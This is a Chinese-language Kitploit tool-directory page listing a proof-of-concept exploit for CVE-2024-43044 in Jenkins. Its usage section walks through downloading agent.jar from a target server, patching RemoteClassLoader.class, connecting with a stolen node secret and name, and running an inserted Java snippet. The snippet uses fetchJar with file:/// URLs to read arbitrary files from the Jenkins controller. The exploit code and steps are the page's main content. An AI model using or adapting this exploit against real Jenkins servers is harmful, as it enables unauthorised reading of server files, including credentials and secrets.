Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-43044-POC — CVE-2024-43044的利用方式 | Kitploit
工具/GitHubGitHub/v9d0g/cve-2024-43044-poc
漏洞分析漏洞利用Web应用程序漏洞利用远程访问工具Payload 开发
GitHubv9d0g/cve-2024-43044-poc

CVE-2024-43044-POC

CVE-2024-43044的利用方式

查看仓库
20122年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

用法

通过http://ip:port/jnlpJars/agent.jar下载jar包

修改\hudson\remoting\RemoteClassLoader.class对应代码

重新编译打包

需提前获悉node的密钥和名称

root@kitploit:~
java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx>

添加内容为:

root@kitploit:~
import java.util.Scanner;

try {  
    Scanner scanner = new Scanner(System.in);  
    System.out.print("输入读取文件path:");  
    String inputText = scanner.nextLine();  
    System.out.println("尝试读取:" + inputText);  
    URL jarFileUrl = new URL("file:///" + inputText);  
    byte[] fileContent = this.proxy.fetchJar(jarFileUrl);  
    String contentAsString = new String(fileContent, StandardCharsets.UTF_8);  
    System.out.println("文件内容:\n" + contentAsString);  
} catch (Exception var10) {  
    System.out.println("WRONG:" + var10);  
}

下载工具